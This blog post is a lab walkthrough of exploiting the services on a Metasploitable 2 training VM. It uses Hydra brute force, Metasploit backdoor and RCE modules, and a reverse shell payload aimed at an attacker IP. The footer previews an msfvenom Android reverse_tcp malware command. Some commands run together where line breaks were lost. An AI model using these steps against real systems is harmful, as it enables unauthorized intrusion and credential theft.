Skip to main content

Exploiting All Ports in Different Techniques



  • In this section we will exploit the active ports in different techniques.
  • The ports we are trying to exploit are FTP, SSH, TELNET, SMTP, NETBIOS-SSN, JAVA RMI, BINDSHELL, ProFTPD, MYSQL, DISTCCD, VNC, X11, UnrealIRCD, TOMCAT, RUBY-DRB.

1. 21-FTP

  • Method 1:

Login with Anonymous as username and no password.

If you need more info about Anonymous FTP you can find it here.

https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol

ftp 192.168.0.130

 


 

  • Method 2 :

Through Brute-force using Hydra but you need to have a custom list of usernames and passwords.

hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V

 


 

It will take each username and password from the given files and try to login to the target FTP service.

Once you found the credentials you can directly log in.

 


 

After logging in to a user account, You can get root access by doing Privilege escalation.

  • Method 3 :

Exploiting FTP through Metasploit framework

open Metasploit framework console and search for vsftpd Backdoor exploit

msfconsole

Search vsftpd

use exploit/unix/ftp/vsftpd_234_backdoor

 


 

show options

 


 

set RHOSTS 192.168.0.130 --> <target IP address>exploit

Congratulations you got root access

2. 22-SSH

Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network.

Exploiting SSH in Different Techniques

  • Method 1

Cracking Username and password with Hydra

Hydra is an inbuilt tool in Kali-Linux used to Brute force attack is a trial and error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys, through exhaustive effort (using brute force) rather than employing intellectual strategies.

hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>

 


 

  • Method 2

  1. Open Metasploit framework
  2. Open terminal and type these commands :

service postgresql startmsfconsolesearch ssh_loginuse auxiliary/scanner/ssh/ssh_login 

 

3.set this auxiliary and see what it requires.

set RHOSTS <target IP Address> --> in my case 192.168.0.130

 


 

               4. Set predefined Usernames list and Passwords List

set USER_FILE <Username file Path>set PASS_FILE <Password file Path>exploit

It will take time-based your usernames and passwords List and It will Notify with username. Login with those credentials.

ssh username@targetipaddress

 


 

You have user access, can’t perform all the tasks so try to get root access by doing Privilege escalation.

3. 23-TELNET

Telnet is a simple, text-based network protocol that is used for accessing remote computers over TCP/IP networks like the Internet. Telnet was created and launched in 1969 and, historically speaking, you can say that it was the first Internet.

telnet <target IP Address> --> 192.168.0.130

 


 

By default it will Grab Metasploitable 2 banner, it shows that Login with msfadmin/msfadmin to get a start. Just enter those credentials you are in.

4. 25-SMTP

SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks. It works closely with something called the Mail Transfer Agent (MTA) to send your communication to the right computer and email inbox.

  • Method 1:

  1. Using Metasploit
  2. Start the Metasploit by executing the commands

service postgresql startmsfconsole -qsearch smtp_version

 


 

use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit  (or)  runshow optionsset RHOST 192.168.0.130exploit  (or)  run

 


 

SMTP stands for Simple Mail Transport Protocol and is a server-to-server protocol that keeps a local database of users to which it must send and receive emails.

SMTP has a set of commands. We’re going to connect to our target with “netcat” through port 25 and try to acquire this database emails.

    3.Open a new terminal and type:

nc 192.168.0.130 25

 


 

Now the connection is established you can verify by the “SMTP” commands

Type: vrfy user

vrfy (This is a non-interactive shell)

 


 

For SMTP Commands Visit: http://www.tcpipguide.com/free/t_SMTPCommands-2.htm

  • Method 2

  1. Using smtp_enum
  2. This can be done by Metasploit

search smtp_enum

 


 

use auxiliary/scanner/smtp/smtp_enum

 


 

show optionsset RHOST 192.168.0.130exploit

 


 

This method uses enumeration to find out this list of users in the SMTP service.

Later NetCat can be helpful to get a reverse connection with that user.

5. 139&445 Netbios-SSN

Samba is an open-source project that is widely used on Linux and Unix computers so they can work with Windows file and print services.

We can even use Samba as an Active server to handle login, authentication and access control for a Windows network.

Search for exploit

 


 

use exploit/multi/samba/usermap_script

 


 

To view the options for the exploit

 


 

show optionsSet RHOST192.168.0.130 (Target IP address)

Set the payload

Show payloadsSet payload cmd/unix/reverse

 


 

Set required arguments for payload

Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444

 


 

Check once all required arguments are filled

exploit

6. 1099–Java-RMI

Remote Method Invocation (RMI) is an API that allows an object to invoke a method on an object that exists in another address space, which could be on the same machine or a remote machine.

Exploiting java-RMI-server

search for the exploit

search java_rmi_server

 


 

Choose the exploit according to their rank. for instance, “excellent” works better than “normal”.

use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit

 


 

We got access to the target machine.

7. 1524-BINDSHELL

Bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection. The attacker then connects to the victim machine’s listener which then leads to code or command execution on the server.

  • Exploitation

It is a root shell so we can connect through netcat service.

nc <target ip address> 1524

 


 

Congratulations, You are a root user now.

8. 2121-ProFTPD

Before exploiting this port you need to have login credentials so as we know the method get it through Brute-force technique, We can access ProFTPd with telnet, We are using here user: user.

telnet <Taget IP Address> <Port Number>USER <username>
PASS <password>

 


 

It is a normal user, Try Privilege Escalation to gain root control.

9. 3306-MYSQL

  • Method 1:

search for the exploit

search scanner/mysql/mysql_login

 


 

use auxiliary/scanner/mysql/mysql_login

 


 

Sometimes there might be a chance of having a blank password for MySQL. So we can exploit it directly.

Note: by default, it shows BLANK_PASSWORDS as false, set it to true.

set BLANK_PASSWORDS as true

 


 

  • Method:2

In this method, we are going to exploit MySQL by using this command providing the username as root and target’s IP.

mysql -u root -h <target's IP>

 


 

10. 3632-DISTCCD

Distcc is a tool for speeding up the compilation of source code by using distributed computing over a computer network. With the right configuration

distcc can dramatically reduce a project’s compilation time

  • Exploiting port 3632 using distcc-exec

Open msfconsole and search for distcc_exec

search distcc_execshow options

Set required arguments to exploit

set RHOSTS <target-ip>exploit

 


 

We got Shell Access…try to do privilege escalation for Higher privilege

11. 5432-Postgresql

Exploiting PostgreSQL with postgre_payload

  • Open msfconsole & search for postgres_payload

search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options

 


 

Set required arguments for exploit

set RHOSTS <target-ip>

By default, it will use username as postgres

exploit

 


 

Successfully logged in postgresql…Let’s get a shell for doing more stuff…

 


 

Try to do privilege escalation…Happy learning..!!!

12. 5900-VNC

  • Open msfconsole and search for exploit vnc_login

search vnc_loginuse auxiliary/scanner/vnc/vnc_login

 


 

show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit

 


 

This method is used to exploit VNC software hosted on Linux or Unix or Windows Operating Systems with authentication vulnerability.

Try to connect vnc with that password

Open Vnc Viewer in Terminal & Type the IP address and connect

A login prompt popup and ask to provide credentials

 


 

Then Enter the password and click OK.

 


 

Voilaaa…!!! you got Access…I know what are you thinking right Now..Don’t mess with the things around..Happy Learning.

13. 6000-X11

The X Window System (aka X) is a windowing system for bitmap displays, which is common on UNIX-based operating systems. X provides the basic framework for a GUI based environment.

The remote X11 server accepts connections from anywhere one can get an Internet connection. It is responsible for access to the graphics cards, the input devices, and the display screen on either computer or wireless device.

  • Exploiting port 6000 using ssh

ssh -X -l msfadmin 192.168.0.122

In the above command ‘X’ enables all ports forwarding, by providing username and target’s IP gives us the shell

 


 

14. 6667 & 6697 UnrealIRCD

  1. UnrealIRCd is an Open Source IRC Server, serving thousands of networks since 1999. It runs on Linux, OS X, and Windows
  2. UnrealIRCd is a highly advanced IRCd with a strong focus on modularity, an advanced and highly configurable configuration file. Key features include SSL
  3. UnrealIRCd is one of the most popular and full-featured IRC daemons and is used on the largest number of IRC servers
  4. This server is described as having possibly the most security features of any IRC server.
  5. Protocols used: Internet Relay Chat
  6. Let’s Exploit this IRC Server.

  • Method 1: on port 6667

search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options

 


 

Set the required arguments for exploit

set RHOSTS <target-ip>

by default 6667 port number is assigned to exploit

run (or) exploit

 


 

Heyyy…We got root…We are living on the edge…

  • Method 2: On port 6697

                1.Use above exploit and set the required arguments
                2.This time set port as 6697

set RHOSTS <target-ip>set RPORT 6697

 


 

And Second time also we got root…Try to Exploit this…Happy learning

15. 8180-TOMCAT

Apache Tomcat is an open-source implementation of the Java Servlet, JavaServer Pages, Java Expression Language, and WebSocket technologies. Tomcat provides a “pure Java” HTTP web server environment in which Java code can run.

  • Exploiting Apache-Tomcat

It can be completed in two steps:

  1. Open msfconsole & search for tomcat_mgr_login

search tomcat_mgr_loginset RHOSTS <target-ip>

 


 

show options

Exploit will assign default usernames & passwords lists. After setting the arguments to exploit Type exploit (or) run

run

 


 

Take the same username and password and give it to the next exploit.

search for tomcat manager exploits

search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options

 


 

Set RHOSTS, RPORT, and HttpPassword, HttpUsername which we got from tomcat login exploit and then run the exploit.

 


 

msfconsole could assign the suitable payload for an exploit, That’s why we got meterpreter…

16. 8787-Ruby-drb

  • dRuby is a distributed object system for Ruby. It is written in pure Ruby and uses its protocol.
  • No addon services are needed beyond those provided by the Ruby run time, such as TCP sockets.

search drb_remote_codeexec

Set the required arguments to exploit

 


 

show optionsset RHOSTS <target-ip>exploit (or) run

VOILA you got root shell access…try to use some shell commands.


Thank You!!!!!!! 

Comments

Post a Comment

Popular posts from this blog

Files Transferring Techniques

        Often I struggled to transfer files from Host to Attacker and Attacker to Host.Sometimes i forget the commands and techniques that I learned before.So i am making notes of this to refer in future.We can easily downloads files from web server using browser..but what about command line.         File Transfer is a pain, and in most cases,After gaining initial access on the target machine, and with file transfers, we can upload tools and exploits on the target to try and elevate the privileges, exfiltrate sensitive data from the target back to your machine or just move around files to/from the target and you . Linux(Setting up the server's) 1.Apache We can serve files using apache server,but i love using python modules instead of apache server. Because first we need to move files into   /var/www/html   directory,then we need to start  Apache  server.          ...
Post a Comment
Read more

Android Hacking With Metasploit

Hello This is my first blog regarding the android hacking with metasploit. I am in the learning stage and if you found some error then point out them and feel free to contact me. Step 1:- First of all we have to open terminal and start some services with commands like:-                                          (a) start apache2 start                                          (b) start postgresql start Then we have to start metasploit framework with the command msfconsole. Step 2:- Then we have to create android malware using metasploit framework in new window. Execute the Command:- msfvenom -p android/meterpreter/reverse_tcp LHOST= <attacker IP> LPORT= <attacker PORT> R > <filename.apk> N.B:- msfvenom is a command line code t...
Read more